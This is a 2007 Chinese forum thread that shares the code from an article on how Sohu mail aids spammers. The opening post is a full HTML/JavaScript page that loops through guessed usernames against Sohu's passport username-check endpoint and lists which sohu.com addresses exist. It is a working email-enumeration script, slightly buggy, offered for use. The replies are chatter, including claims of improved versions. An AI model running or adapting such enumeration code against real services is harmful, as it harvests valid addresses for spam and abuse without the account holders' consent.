返回列表 发帖

“Ajax让Sohu邮箱成为垃圾邮件的帮凶”一文的代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>m.html</TITLE>
<META http-equiv=content-type content="text/html; charset=UTF-8">
<SCRIPT language=javascript>

var xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
var f = ['admin1','admin2','admin3','admin4','admin5','admin6','admin7','admin8','admin9','admin10','admin11','admin12','admin13','admin14','admin15','admin16','admin17','admin18','admin19','admin21','admin20','admin22','admin23','admin24','admin25','admin26','admin27','admin28','admin29','admin30','adm0','amin30','adn30','ain30'];
var i = 0;
        function rrrrrr()
        {
                alert('开始');
                for(;i<f.length;i++)
                {
                        xmlHttp.open('GET', 'http://passport.sohu.com/web/check.jsp?operator=checkusername&userdomain=sohu.com&username='+f+'&time='+(new Date()).getTime(), false);
                        xmlHttp.onreadystatechange = res;
                        xmlHttp.send();
                }
        }
        function res()
        {
                if (xmlHttp.readyState==4) {
                        if (xmlHttp.status==200) {
                                var txt = xmlHttp.responseText;
                                if (txt.indexOf("该")>-1)       
                                {
                                        txtid.innerHTML = txtid.innerHTML + '存在的:'+f + '@sohu.com<br>';
                                }else
                                {
                                        txtid.innerHTML = txtid.innerHTML +'不存在:' + f+ '@sohu.com<br>';
                                }
                        } else {
                                alert('服务器状态错误, 代码:' + xmlHttp.status);
                        }
                }
        }
</SCRIPT>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<DIV id=txtid align=center>a<BR></DIV>
<TABLE align=center>
  <TBODY>
  <TR>
    <TD align=middle>
        AJAX查看搜狐的注册邮箱<br>
        ps:有点慢,非异步调用ActiveX<br>
        <INPUT id=aaa onclick=rrrrrr() type=button align=middle value=点我查看><BR></TD></TR></TBODY></TABLE></BODY></HTML>

111

也可以下载附件浏览。
附件: 您需要登录才可以下载或查看附件。没有帐号?注册

TOP

貌似现在SOHU还没有引起重视。。。

原文地址是:
http://publish.it168.com/2007/0606/20070606005701.shtml

[ 本帖最后由 Bugkidz 于 2007-6-6 07:09 编辑 ]
用windows 就用蓝屏的 !

TOP

我的意中人是个绝色大美女,终会有一天她会骑着喷火的恐龙来嫁给我的,可是我看见了她的座骑,却没有看见它的主人……

TOP

看看,下载

TOP

楼主代码有问题?小改一下。
文章已经被5dmial转载:http://www.5dmail.net/html/2007-6-10/200761010437.htm
附件: 您需要登录才可以下载或查看附件。没有帐号?注册

TOP

看不懂。。。

TOP

的确很多垃圾邮件~
~~~打劫帮长老~~~

就在昨夜我听见了花开的声音

TOP

不太懂呀.

TOP

代码不完美..我改下..嘿嘿

代码不完美..我改下..嘿嘿
附件: 您需要登录才可以下载或查看附件。没有帐号?注册

TOP

顶起楼上的..哈哈..
用windows 就用蓝屏的 !

TOP

顶起来,我要看看

TOP

晕倒,为什么我不能下载啊

TOP

也不能算是漏洞,只能说容易被入侵而已。

TOP

返回列表